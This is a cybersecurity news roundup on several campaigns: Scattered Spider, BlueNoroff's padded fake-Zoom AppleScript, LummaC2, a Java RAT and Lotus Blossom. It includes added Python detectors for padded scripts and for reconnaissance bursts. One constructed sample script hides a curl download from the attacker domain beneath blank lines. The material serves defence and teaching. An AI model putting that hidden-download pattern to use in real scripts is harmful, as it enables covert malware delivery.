
FBI Raises Alarm as Scattered Spider Threat Group Expands Target Sectors


The Federal Bureau of Investigation (FBI) has issued a high-level cybersecurity alert warning about the growing threat posed by Scattered Spider, a cybercriminal group now targeting the transportation sector, specifically the aviation industry, and expanding its focus to insurance companies. Previously associated with large-scale ransomware attacks in the retail sector, including a significant breach at Marks & Spencer in the UK that resulted in losses exceeding $600 million, the group is now shifting tactics and industries.

A recent analysis by cybersecurity firm Halcyon, confirmed by the FBI, highlights how Scattered Spider is using advanced social engineering to bypass multi-factor authentication (MFA), often by impersonating employees or contractors and deceiving IT help desks into enrolling unauthorized MFA devices. The FBI has urged organizations to strengthen their MFA enrollment and reset procedures and report any suspicious activity promptly. Research from ReliaQuest shows the group often spoofs technology vendors and specifically targets high-access individuals such as system administrators and executives.

Scattered Spider is financially driven and reportedly connected to a broader cybercriminal collective known as The Community. Its collaborations with ransomware operators such as ALPHV, RansomHub, and DragonForce have enabled it to access sophisticated cyber tools. What makes the group particularly dangerous is its ability to blend technical skill with social engineering, recruiting English-speaking attackers with neutral accents and regional familiarity to convincingly impersonate support staff during Western business hours. Real-time coaching and detailed scripts further enhance the success of these impersonation efforts.

Beyond aviation, experts are now seeing signs of similar attacks in the U.S. insurance sector. Google’s Threat Intelligence Group confirmed multiple such incidents, and security leaders warn that these are not isolated cases. Jon Abbott, CEO of ThreatAware, emphasized that this trend signals a broader threat landscape for all industries. 

Richard Orange of Abnormal AI noted that Scattered Spider relies more on manipulating human behaviour than exploiting software vulnerabilities, often moving laterally across systems to gain broader access. The group’s exploitation of supply chain links has been a consistent tactic, making even indirect associations with targeted sectors a point of vulnerability. As the FBI continues to work with affected industries, experts stress that all organizations, regardless of sector, must enhance employee awareness, implement strict identity verification, and maintain vigilance against social engineering threats.

North Korean Hackers Target Fintech and Gaming Firms with Fake Zoom Apps


A newly uncovered cyber campaign is targeting organizations across North America, Europe, and the Asia-Pacific by exploiting fake Zoom applications. Cybersecurity experts have traced the operation to BlueNoroff, a notorious North Korean state-backed hacking group affiliated with the Lazarus Group. The campaign’s primary focus is on the gaming, entertainment, and fintech sectors, aiming to infiltrate systems and steal cryptocurrency and other sensitive financial data. 

Attack strategy 

The attack begins with a seemingly innocuous AppleScript disguised as a routine maintenance operation for Zoom’s software development kit (SDK). However, hidden within the script—buried beneath roughly 10,000 blank lines—are malicious commands that quietly download malware from a counterfeit domain, zoom-tech[.]us. 

Once downloaded, the malware installs itself as a LaunchDaemon, which gives it persistent, privileged execution at every system startup and lets it operate covertly without raising immediate alarms. The malicious software doesn’t stop there. It fetches additional payloads from compromised infrastructure, presenting them as legitimate macOS components such as “icloud_helper” and “Wi-Fi Updater.”

These files are designed with anti-forensics techniques to erase temporary files and conceal their activity, all while maintaining a hidden backdoor for remote control and data exfiltration. This deceptive approach is particularly dangerous in remote work environments, where minor software issues are often resolved without deep inspection—making it easier for such malware to slip past unnoticed. 

Motives behind the attack

BlueNoroff’s intent appears financially driven. The malware specifically searches for cryptocurrency wallet extensions, browser-stored login credentials, and authentication keys. In one known incident dated May 28, a Canadian online gambling platform fell victim to this scheme after its systems were compromised via a fraudulent Zoom troubleshooting script. 

Protection Measures for Organizations

Given the growing sophistication of such campaigns, security experts recommend several protective steps:

• Independently verify Zoom participants to ensure authenticity. 

• Block suspicious domains like zoom-tech[.]us at the firewall level. 

• Deploy comprehensive endpoint protection that can detect hidden scripts and unauthorized daemons. 

• Invest in reliable antivirus and ransomware protection, especially for firms with cryptocurrency exposure. 

• Use identity theft monitoring services to detect compromised credentials early. 

• Train employees to recognize and respond to social engineering attempts. 

• Secure digital assets with hardware wallets instead of relying on software-based solutions alone.
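The padded-script lure and the domain-blocking advice above can both be turned into a simple defensive check. The following is an added example, not code from the original post or from any vendor named in it: it flags script files whose payload sits beneath a long run of blank lines and that reference a blocked domain; the blank-line threshold, the sample script and the URL path are constructed assumptions.

```python
"""Heuristic checks for padded AppleScript lures and blocked-domain references.

Added example; the block-list entry comes from the post (defanged there as
zoom-tech[.]us), the threshold and sample script are constructed.
"""
import re

# Refanged so it can be compared with hostnames found in a script.
BLOCKED_DOMAINS = {"zoom-tech.us"}

# Assumption: real scripts rarely carry hundreds of consecutive blank lines;
# the campaign described used roughly 10,000, so 500 leaves a wide margin.
MAX_BLANK_RUN = 500

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)


def longest_blank_run(text: str) -> int:
    """Return the length of the longest run of consecutive blank lines."""
    longest = current = 0
    for line in text.splitlines():
        if line.strip() == "":
            current += 1
            longest = max(longest, current)
        else:
            current = 0
    return longest


def referenced_domains(text: str) -> set[str]:
    """Collect hostnames from any http(s) URLs in the script, lower-cased."""
    return {m.group(1).lower().rstrip(".") for m in URL_RE.finditer(text)}


def analyse_script(text: str) -> dict:
    """Report padding and blocked-domain findings for one script body."""
    run = longest_blank_run(text)
    hits = sorted(referenced_domains(text) & BLOCKED_DOMAINS)
    return {
        "longest_blank_run": run,
        "padded": run >= MAX_BLANK_RUN,
        "blocked_domains": hits,
        "suspicious": run >= MAX_BLANK_RUN or bool(hits),
    }


# Constructed sample: a benign-looking header, 2,000 blank lines, then a
# fetch from the blocked domain (the URL path is a placeholder).
SAMPLE_SCRIPT = (
    "-- Zoom SDK maintenance: clears cached SDK files\n"
    'display dialog "Checking Zoom SDK..."\n'
    + "\n" * 2000
    + 'do shell script "curl -s https://zoom-tech.us/placeholder -o /tmp/x"\n'
)

if __name__ == "__main__":
    print(analyse_script(SAMPLE_SCRIPT))
```

The same `analyse_script` function can be pointed at any text-based script (shell, AppleScript, PowerShell) pulled from a mail gateway or endpoint quarantine.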

US Embassy Cautions Visa Applicants After Bengaluru Man Falls Prey to Scam


The US Embassy in New Delhi has issued a cautionary alert to individuals applying for US visas, urging them to be wary of online scams that falsely promise to expedite visa interview appointments. This warning comes in the wake of a cyber fraud case reported from Bengaluru, where a 45-year-old engineer was duped by a scammer posing as a facilitator on the Telegram messaging app. 

According to reports, the engineer, a resident of RR Nagar, came across a Telegram channel on May 22 that appeared to offer assistance in advancing B-1/B-2 visa interview dates. His appointment was initially set for April 2026. Shortly after joining the channel, he was contacted by someone claiming to be Vanam Sravan Krishna. The individual promised to reschedule the appointment for a fee of ₹10,000. Trusting the offer, the victim shared his US visa portal login credentials and transferred the amount. 

The scammer later sent a forged appointment confirmation and demanded an additional ₹10,000, threatening to change the login credentials if the payment wasn’t made. After the second payment, the fraudster locked the victim out of his visa account by altering the credentials. A case was subsequently filed with the West CEN police on May 24, and investigations are ongoing. 

Following the incident, the US Embassy took to social media to warn applicants that any claim of fast-tracking visa appointments for money is fraudulent. The post emphasized that personal information and login details should never be shared with unverified sources. Embassy officials reiterated that only official platforms should be used for visa-related processes. 

A senior official from the Criminal Investigation Department noted that the applicant may not receive support from the embassy in this case, as he voluntarily shared his credentials and attempted to bypass the official process. According to the officer, the applicant may no longer be able to generate a fresh visa request. 

The incident comes amid evolving visa policies, including proposals reportedly under consideration by US authorities to introduce a $1,000 premium processing fee for faster interview appointments. This follows a broader move to tighten visa screening procedures, including the suspension of new student and visitor visa interviews in several countries. The embassy’s latest alert serves as a reminder to applicants to rely solely on official sources and to be vigilant against offers that appear too good to be true.

U.S. Shuts Down LummaC2 Malware Network in Major Takedown


In a major crackdown on cybercrime, the U.S. Department of Justice (DOJ), in coordination with the FBI and Microsoft, has dismantled a global malware operation known as LummaC2 by seizing five internet domains used to deploy the infostealer malware. LummaC2, notorious for stealing personal and financial data such as browser history, login credentials, and cryptocurrency wallet information, had compromised at least 1.7 million systems worldwide. 

The takedown occurred over three days in May 2025, with two domains seized on May 19, followed by the rapid seizure of three additional domains after the malware operators attempted to restore access. These domains acted as user panels for cybercriminals leasing or buying access to the malware, allowing them to deploy it across networks and extract stolen data. 

FBI Assistant Director Bryan Vorndran said, “We took action against the most popular infostealer service available in online criminal markets. Thanks to partnerships with the private sector, we were able to disrupt the LummaC2 infrastructure and seize user panels.” 

DOJ Criminal Division head Matthew R. Galeotti added, “This type of malware is used to steal personal data from millions, facilitating crimes such as fraudulent bank transfers and cryptocurrency theft.” In a parallel move, Microsoft launched a civil legal action to take down 2,300 more domains believed to be linked to LummaC2 actors or their proxies. 

Emphasising the value of collaboration, Sue J. Bai, chief of the DOJ’s National Security Division, said, “Today’s disruption is another instance where our prosecutors, agents, and private sector partners came together to protect us from the persistent cybersecurity threats targeting our country.” 

The operation, led by the FBI’s Dallas Field Office and supported by several DOJ divisions, forms part of a broader U.S. strategy to counter cyber threats, including a State Department programme offering up to $10 million for information on individuals targeting U.S. critical infrastructure.

Multiplatform Malware Campaign Uses PDF Invoices to Deploy Java-Based RAT


A new wave of cyberattacks is sweeping across digital infrastructures globally, leveraging weaponised PDF invoices to infiltrate systems with a sophisticated Java-based Remote Access Trojan (RAT). Security researchers from Fortinet have identified a multi-stage, evasive malware campaign targeting Windows, Linux, and macOS devices, exploiting the cross-platform capabilities of Java to establish remote control over compromised machines. 

The attack chain begins with phishing emails that appear to contain legitimate invoice attachments. These emails pass domain authentication checks—such as SPF validation—by misusing the serviciodecorreo.es mail service, which is permitted to send messages on behalf of numerous domains. The attached PDF lures recipients with urgent invoice-related messaging, prompting them to click embedded buttons that lead to the next stage of infection. 

Once a user interacts with the PDF, they are redirected to a Dropbox-hosted HTML file titled “Fattura”—the Italian word for “invoice.” This file prompts a basic CAPTCHA check before further redirecting the victim to a URL generated by Ngrok, a legitimate tunneling service often abused to conceal malicious activity. 

What makes this campaign particularly difficult to detect is its use of geolocation filtering. Depending on the user’s IP address, the final content differs: users located in Italy receive a Java Archive (JAR) file camouflaged under generic filenames such as “FA-43-03-2025.jar,” while users from other regions are shown an innocuous Google Drive document containing a non-malicious invoice from an entity named Medinova Health Group. This strategy effectively thwarts email security platforms that scan links from centralised cloud environments, which often lack region-specific browsing behaviour. 

If the user downloads and runs the JAR file, a Java-based Remote Access Trojan known as RATty is deployed. This malware allows attackers to execute remote commands, log keystrokes, capture screenshots, access files, and even control webcams and microphones. Because it runs on the Java Runtime Environment (JRE), the RAT functions across operating systems, significantly broadening its potential victim base. To further evade detection, the campaign uses trusted platforms like Dropbox and MediaFire to host malicious components. Additionally, Ngrok’s dynamic tunneling service helps the attackers disguise their infrastructure, making attribution and blocking more difficult.

The attackers have also conducted reconnaissance to identify vulnerable domains, optimising their strategy for maximum penetration and persistence. Security experts warn that the use of such multilayered and cross-platform infection techniques reflects the growing sophistication of threat actors. The campaign not only highlights the critical need for advanced threat detection systems but also reinforces the importance of user awareness, particularly around email-based social engineering tactics. 

Organisations are urged to ensure their endpoint protection tools are updated and to consider restricting the execution of Java applications from unknown sources. Furthermore, robust geofencing-aware email filtering and sandboxing solutions could help in flagging such targeted, region-specific attacks before they escalate.

Bitdefender Warns of Surge in Subscription Scams Disguised as Online Stores and Mystery Boxes


Cybersecurity researchers at Bitdefender have uncovered a sharp increase in deceptive online subscription scams, with fraudsters disguising themselves as legitimate e-commerce platforms and mystery box vendors. These sophisticated schemes are luring unsuspecting users into handing over sensitive credit card details under the guise of low-cost purchases. 

Unlike older, more obvious fraud attempts, this new wave of scams involves meticulously crafted fake websites that mimic real online shops. Bitdefender’s investigation revealed over 200 fraudulent sites offering goods such as footwear, apparel, and electronic gadgets. 

The catch? Victims unknowingly agree to recurring subscription charges cleverly hidden in the fine print.

One tactic gaining traction is the so-called “mystery box” scam. These scams entice consumers with a small upfront fee in exchange for a surprise package, often marketed as unclaimed luggage or packages left behind at airports or post offices. However, the real goal is to harvest personal and payment information, often enrolling victims in recurring payment plans before the transaction is even finalized. The scams are widely advertised on social media platforms, including Facebook, through sponsored posts.

In many cases, scammers pose as content creators or use fake influencer pages to build trust. Bitdefender researchers found more than 140 websites pushing these scams, with many traced back to a recurring address in Limassol, Cyprus—an address also linked to entities named in the Paradise Papers by the ICIJ Offshore Leaks Database. 

Some websites go further, advertising discounted “member prices” that require account top-ups, like a charge of €44 every two weeks, often concealed in promotional offers. These scams frequently promote multiple membership levels, using store credits and promises of steep discounts to mask overpriced or outdated products. 

Bitdefender warns that the evolving nature of these scams—complete with high-quality websites, paid advertising, and fake brand endorsements—makes them harder to detect. With the profitability of subscription fraud rising, scammers are scaling their operations, expanding beyond mystery boxes into bogus product sales and investment offers. 

Researchers caution users to stay vigilant while shopping online, especially when prompted to enter payment information for deals that seem too good to be true. As these tactics grow more elaborate, consumers are urged to read the fine print and verify the authenticity of online shops before completing any transactions.

Netflix Users Warned About AI-Powered Phishing Scam


Netflix subscribers are being warned about a sophisticated phishing scam circulating via email, designed to steal personal and financial information. 

The deceptive email mimics an official Netflix communication, falsely claiming that the recipient’s account has been put on hold. It urges users to click a link to resolve the issue, which redirects them to a fraudulent login page that closely resembles Netflix’s official site. 

Unsuspecting users are then prompted to enter sensitive details, including their Netflix credentials, home address, and payment information. Cybersecurity experts caution that phishing scams have become more advanced with the rise of AI-driven tactics. 

According to Jake Moore, Global Cybersecurity Advisor at ESET, artificial intelligence has enabled cybercriminals to launch phishing campaigns at an unprecedented scale, making them appear more legitimate while targeting a larger number of users. 

“Despite these advancements, many scams still rely on urgency to pressure recipients into acting quickly without verifying the sender’s authenticity,” Moore explained. 

Users are advised to remain vigilant, double-check email sources, and avoid clicking on suspicious links. Instead, they should visit Netflix directly through its official website or app to verify any account-related issues.

Cisco Talos Uncovers Lotus Blossom’s Multi-Campaign Cyber Espionage Operations

Cisco Talos has uncovered a series of cyber espionage campaigns attributed to the advanced persistent threat (APT) group Lotus Blossom, also known as Spring Dragon, Billbug, and Thrip. 

The group has been active since at least 2012, targeting government, manufacturing, telecommunications, and media sectors in regions such as the Philippines, Vietnam, Hong Kong, and Taiwan. Talos identified Sagerunex, a backdoor tool used exclusively by Lotus Blossom, as the core malware in these campaigns. 

The investigation revealed multiple variants of Sagerunex, evolving from its original form to leverage third-party cloud services such as Dropbox, Twitter, and Zimbra webmail as command-and-control (C2) tunnels, instead of traditional Virtual Private Servers (VPS). This shift helps the group evade detection while maintaining control over infected endpoints. 

The group has been observed gaining persistence on compromised systems by embedding Sagerunex into the system registry and configuring it to run as a service. The malware operates as a dynamic link library (DLL), executed directly in memory to avoid detection. The campaigns also showcase long-term persistence strategies, allowing attackers to remain undetected for months. 

Beyond Sagerunex, Lotus Blossom employs an arsenal of hacking tools to facilitate credential theft, privilege escalation, and data exfiltration. These include a Chrome cookie stealer from GitHub, a customized Venom proxy tool, a privilege adjustment tool, and an archiving tool for encrypting and stealing data. 

Additionally, the group utilizes mtrain V1.01, a modified HTran proxy relay tool, to route connections between compromised machines and external networks. The attack chain follows a structured multi-stage approach, starting with reconnaissance commands such as “net,” “tasklist,” “ipconfig,” and “netstat” to gather system details. 

If an infected machine lacks direct internet access, the attackers leverage proxy settings or the Venom tool to establish connectivity. A notable tactic involves storing malicious tools in the “public\pictures” subfolder, a non-restricted directory, to avoid detection.
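Two of the behaviours described above, the burst of “net”, “tasklist”, “ipconfig” and “netstat” reconnaissance and the staging of tools under the public\pictures folder, lend themselves to host-level detection. The following is an added example, not code from Cisco Talos or the report: it runs both checks over constructed process-creation events; the event fields, hostnames, time window and the three-of-four threshold are assumptions.

```python
"""Detection logic for two Lotus Blossom tradecraft signals.

Added example (not from the Talos report): flags hosts that run several of
the named reconnaissance commands within a short window, and any executable
launched from the Public\\Pictures folder. Events below are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RECON_COMMANDS = {"net.exe", "tasklist.exe", "ipconfig.exe", "netstat.exe"}
RECON_WINDOW = timedelta(minutes=5)   # assumption
RECON_MIN_DISTINCT = 3                # assumption: three of the four commands

PUBLIC_PICTURES = "c:\\users\\public\\pictures\\"


def image_name(path: str) -> str:
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def recon_bursts(events):
    """Hosts where >= RECON_MIN_DISTINCT distinct recon commands ran within RECON_WINDOW."""
    per_host = defaultdict(list)
    for ev in events:
        name = image_name(ev["image"])
        if name in RECON_COMMANDS:
            per_host[ev["host"]].append((ev["time"], name))
    flagged = set()
    for host, runs in per_host.items():
        runs.sort()
        for i, (start, _) in enumerate(runs):
            names = {n for t, n in runs[i:] if t - start <= RECON_WINDOW}
            if len(names) >= RECON_MIN_DISTINCT:
                flagged.add(host)
                break
    return sorted(flagged)


def public_pictures_executions(events):
    """(host, image) pairs for executables launched from Public\\Pictures."""
    return [(ev["host"], ev["image"]) for ev in events
            if ev["image"].replace("/", "\\").lower().startswith(PUBLIC_PICTURES)]


def _t(s):
    return datetime.fromisoformat(s)


# Constructed events with Sysmon-style fields (simplified); file names are made up.
SAMPLE_EVENTS = [
    {"time": _t("2025-03-01T09:00:00"), "host": "WS-01", "image": r"C:\Windows\System32\net.exe"},
    {"time": _t("2025-03-01T09:00:20"), "host": "WS-01", "image": r"C:\Windows\System32\tasklist.exe"},
    {"time": _t("2025-03-01T09:01:05"), "host": "WS-01", "image": r"C:\Windows\System32\ipconfig.exe"},
    {"time": _t("2025-03-01T09:01:40"), "host": "WS-01", "image": r"C:\Windows\System32\netstat.exe"},
    {"time": _t("2025-03-01T09:03:00"), "host": "WS-01", "image": r"C:\Users\Public\Pictures\update.exe"},
    {"time": _t("2025-03-01T10:00:00"), "host": "WS-02", "image": r"C:\Windows\System32\ipconfig.exe"},
    {"time": _t("2025-03-01T14:00:00"), "host": "WS-02", "image": r"C:\Windows\System32\netstat.exe"},
]

if __name__ == "__main__":
    print(recon_bursts(SAMPLE_EVENTS), public_pictures_executions(SAMPLE_EVENTS))
```

WS-02 runs two of the commands hours apart and is not flagged, which is the point of the time window: administrators run these tools too, but rarely all of them in one short burst.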

Talos’ research underscores the growing sophistication of Lotus Blossom, which continues to refine its techniques and expand its capabilities. With high confidence, Cisco attributes these campaigns to Lotus Blossom, highlighting its sustained cyber espionage operations against high-value targets.